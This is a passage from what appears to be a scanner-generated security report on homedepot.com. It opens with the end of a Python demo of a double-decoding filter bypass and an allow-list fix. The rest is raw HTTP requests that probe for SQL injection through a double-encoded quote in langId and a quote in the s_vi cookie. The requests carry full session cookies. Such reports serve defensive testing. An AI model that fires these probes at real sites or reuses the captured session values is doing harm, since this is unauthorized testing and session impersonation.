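    conn.execute("CREATE TABLE language (id INTEGER, code TEXT)")
    conn.execute("INSERT INTO language VALUES (-1, 'en_US')")
    row = conn.execute(
        "SELECT code FROM language WHERE id = ?", (lang_id,)
    ).fetchone()
    conn.close()
    return row[0] if row else None


if __name__ == "__main__":
    print(blocklist_then_decode("-1%27"))      # None (blocked)
    print(blocklist_then_decode("-1%2527"))    # -1' (bypass)
    print(lookup_language("-1"))               # en_US
```

With the allow-list in place the second decode becomes irrelevant: -1%2527 decodes once to -1%27, fails the integer check, and never reaches the query.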

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1%2527&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1 (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:50:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:50:54 GMT
Content-Length: 207104
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225043863%3a%3bC25%5fEXP%3d1360065043%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:50:43 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225043863%3a%3bC25%5fEXP%3d1360065043%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:50:50 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%22127%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24178%2c673%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310817050%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225043863%3a%3bC25%5fEXP%3d1360065043%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:50:50 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228650014%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cQXMNOazhQVxkiPYFRtIAMF0I8wc%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1%2527%2527&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2 (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:50:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:50:55 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225055301%3a%3bC25%5fEXP%3d1360065055%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:50:55 GMT;Path=/


1.72. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [s_vi cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The s_vi cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_vi cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Because the injection point is a cookie rather than a URL parameter, the probe can only be delivered by whoever controls the browser's cookie jar, so exploitability against another user depends on being able to set s_vi for the victim. The response pairing is the same as in 1.70 and carries the same caveat: the single-quote request below reaches GenericError.jsp, and the finding remains Tentative until the error behind that page is confirmed.

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]'; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 12:02:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:02:19 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308225729084%3a%3bC25%5fEXP%3d1360065729%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:02:09 GMT;Path=/
Set-Cookie: THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1;Domain=.homedepot.com;Path=/
Set-Cookie: THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1%3a%3bC6%3d%7b%22I1%22%3a%22217%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24304%2c583%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d%2d1;Domain=.homedepot.com;Path=/
Set-Cookie: WC_PERSISTENT=svXZasEMxmb88kEomTGn54kPt%2bg%3d%0a%3b2011%2d06%2d16+08%3a02%3a14%2e7%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:05:42 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308229334700%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cojrHbNk1QOpsT3PaxOLUWNFF05E%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]''; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; 